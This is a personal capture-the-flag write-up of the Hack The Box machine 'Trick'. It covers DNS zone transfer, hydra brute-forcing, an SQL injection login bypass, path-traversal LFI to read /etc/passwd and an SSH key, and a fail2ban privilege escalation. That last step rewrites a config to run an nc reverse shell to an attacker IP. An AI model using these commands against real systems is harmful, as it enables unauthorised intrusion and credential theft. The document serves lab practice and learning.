HTB Writeups
  • HTB Writeups
  • Boxes: Very Easy
    • Academy
    • Archetype
    • Arctic
    • Base
    • Bike
    • Blue
    • Explosion
    • Included
    • Markup
    • Oopsie
    • Redeemer
    • Responder
    • Shield
    • Unified
    • Vaccine
  • Boxes: Easy
    • Analytics
    • Armageddon
    • Bashed
    • Beep
    • Blocky
    • Bounty Hunter
    • Buff
    • Cap
    • CozyHosting
    • Devel
    • Explore
    • Forest
    • Grandpa
    • Granny
    • Horizontall
    • Jerry
    • Keeper
    • Knife
    • Lame
    • Late
    • Legacy
    • Mirai
    • Netmon
    • Nibbles
    • Optimum
    • Paper
    • Photobomb
    • Precious
    • RedPanda
    • Return
    • Sau
    • ScriptKiddie
    • Sense
    • Servmon
    • Shocker
    • Shoppy
    • Squashed
    • Trick
  • Boxes: Medium
    • Poison
  • Challenges
    • Behind the Scenes
    • Canvas
    • Debugging Interface
    • Digital Cube
    • Easy Phish
    • Find the Easy Pass
    • Forest
    • Infiltration
    • misDIRection
    • Pusheen Loves Graphs
    • Retro
    • Signals
    • The Secret of a Queen
    • Wrong Spooky Season
  • Fortresses
  • Cyber Apocalypse 2023: The Cursed Mission
    • The Cursed Mission
    • Alien Cradle
    • Critical Flight
    • Debug
    • Extraterrestrial Persistence
    • Getting Started
    • Needle in the Haystack
    • Orbital
    • Packet Cyclone
    • Passman
    • Perfect Sync
    • Persistence
    • Plaintext Tleasure
    • Questionnaire
    • Reconfiguration
    • Relic Maps
    • Roten
    • Secret Code
    • Shattered Tablet
    • Small StEps
  • Hack the Boo 2023
    • Hauntmart
    • Spellbrewery
    • Trick or Treat
    • Valhalloween
  • Cyber Apocalypse 2024: Hacker Royale
    • Hacker Royale
    • An Unusual Sighting
    • BoxCutter
    • BunnyPass
    • Character
    • Data Siege
    • Delulu
    • Dynastic
    • Fake Boost
    • Flag Command
    • Game Invitation
    • It has begun
    • KORP Terminal
    • Labyrinth Linguist
    • LockTalk
    • Lucky Faucet
    • Makeshift
    • Maze
    • Packed Away
    • Phreaky
    • Primary Knowledge
    • Pursue the Tracks
    • Rids
    • Russian Roulette
    • Stop Drop and Roll
    • Testimonial
    • TimeKORP
    • Unbreakable
    • Urgent
  • CYBER APOCALYPSE 2025: Tales from Eldoria
    • Tales from Eldoria
    • A New Hire
    • Cave Expedition
    • Echoes in Stone
    • Eldorion
    • Embassy
    • EncryptedScroll
    • HeliosDEX
    • Quack Quack
    • Silent Trap
    • Stealth Invasion
    • Tales for the Brave
    • The Ancient Citadel
    • The Hillside Haven
    • The Stone That Whispers
    • Thorins Amulet
    • ToolPie
    • Traces
    • Trial by Fire
    • Whispers of the Moonbeam
Powered by GitBook
On this page
  • Enumeration
  • DNS AXFR Zone Transfer
  • Manual SQLi
  • LFI w/ Filter Bypass
  • Fail2ban SUID Exploit
  1. Boxes: Easy

Trick

Personal Rating: Medium

Enumeration

A more extensive nmap scan reveals interesting insights:

sudo nmap -A -p- -v <IP>

Discovered open port 80/tcp on 10.10.11.166
Discovered open port 53/tcp on 10.10.11.166
Discovered open port 22/tcp on 10.10.11.166
Discovered open port 25/tcp on 10.10.11.166

53/tcp open  domain
| dns-nsid: 
|_  bind.version: 9.11.5-P4-5.1+deb10u7-Debian

Host script results:
| dns-blacklist: 
|   PROXY
|     misc.dnsbl.sorbs.net - FAIL
|   SPAM
|     l2.apews.org - FAIL
|_    list.quorum.to - FAIL
|_dns-brute: Can't guess domain of "10.10.11.166"; use dns-brute.domain script argument.

So a DNS Server is running on the box!

DNS AXFR Zone Transfer

I found a webserver on port 80, but was stuck there right at the beginning. After checking out the forum I found out that you had to guess the domain trick.htb. I added it to my hosts file and the IP to my resolv.conf as DNS server. Then I could perform an axfr zone transfer over the domain trick.htb with the box as DNS Server:

dig -t axfr @10.10.11.166 trick.htb
; <<>> DiG 9.18.4 <<>> -t axfr @10.10.11.166 trick.htb
; (1 server found)
;; global options: +cmd
trick.htb.		604800	IN	SOA	trick.htb. root.trick.htb. 5 604800 86400 2419200 604800
trick.htb.		604800	IN	NS	trick.htb.
trick.htb.		604800	IN	A	127.0.0.1
trick.htb.		604800	IN	AAAA	::1
preprod-payroll.trick.htb. 604800 IN	CNAME	trick.htb.
trick.htb.		604800	IN	SOA	trick.htb. root.trick.htb. 5 604800 86400 2419200 604800
;; Query time: 86 msec
;; SERVER: 10.10.11.166#53(10.10.11.166) (TCP)
;; WHEN: Sat Jul 09 01:58:08 CEST 2022
;; XFR size: 6 records (messages 1, bytes 231)

root.trick.htb seemed the same as 10.10.11.166:80, but preprod-payroll.trick.htb shew a php login page.

Fuzzing the pages I found, some php files were revealed. Most of them were not of interest though.

At users.php I found a supposed Administrator with the username Enemigosss

I started an ssh bruteforce on that user with hydra, but to no avail:

hydra -L /usr/share/seclists/Usernames/xato-net-10-million-usernames.txt -P /usr/share/seclists/Passwords/xato-net-10-million-passwords.txt preprod-payroll.trick.htb http-post-form "/ajax.php:username=^USER^&password=^PASS^&Login:Login failed, invalid username or password!" -V

I once again had to consult the forum and found out that you should find a third subdomain by guessing. I fuzzed for preprod-FUZZ.trick.htb and found preprod-marketing.trick.htb.

The smtp port was a rabbithole by the way. I could enumerate users by accessing the port with telnet 25, but nothing special was possible. Another way would have been hydra:

hydra smtp-enum://trick.htb:25/rcpt -L "/usr/share/seclists/Usernames/xato-net-10-million-usernames.txt" -p localhost

Manual SQLi

At http://preprod-marketing.trick.htb/login.php I performed some LFI testing and fuzzing, but didn't really find anything. The login page was susceptible to an SQLi though. After some testing I found a working payload to be this:

x' OR '1' = '1'-- -

LFI w/ Filter Bypass

On the authenticated page an LFI was possible:

....//....//....//etc/passwd

As seen, a simple WAF evasion was necessary. But then I could also get the ssh key of the user michael, using the LFI vulnerability.

-----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABFwAAAAdzc2gtcn
<SNIP>
IJhaN0D5bVMdjjFHAAAADW1pY2hhZWxAdHJpY2sBAgMEBQ==
-----END OPENSSH PRIVATE KEY-----

Fail2ban SUID Exploit

sudo -l reveals something:

(root) NOPASSWD: /etc/init.d/fail2ban restart

The command id also shew that the user was member of the security group. I searched for files with permissions of that group and found the folder /etc/fail2ban/action.d with root:security permissions.

The given permissions allow for removing the iptables-multiport.conf and replacing it with a custom one that executes /bin/nc ATTACKERIP 4444 -e /bin/bash upon banning someone. The config file is reset by a cronjob all two minutes, and I have to send many requests in a short period of time to get banned, so I automated both with a bash script on the target and hydra on my machine:

rm /etc/fail2ban/action.d/iptables-multiport.conf
cp /home/michael/temp /etc/fail2ban/action.d/iptables-multiport.conf
sudo /etc/init.d/fail2ban restart
nc -lnvp 4444
hydra -I -l root -P /usr/share/seclists/Passwords/darkweb2017-top10000.txt <TARGETIP> -v ssh

Finding the according config file and finding out, what it does under which conditions was hard for me. I must say I really disliked the fact that you had to guess domains here. But during a real external pentest this might be required and more obvious, so I should expect it the next time.

PreviousSquashedNextPoison

Last updated 1 year ago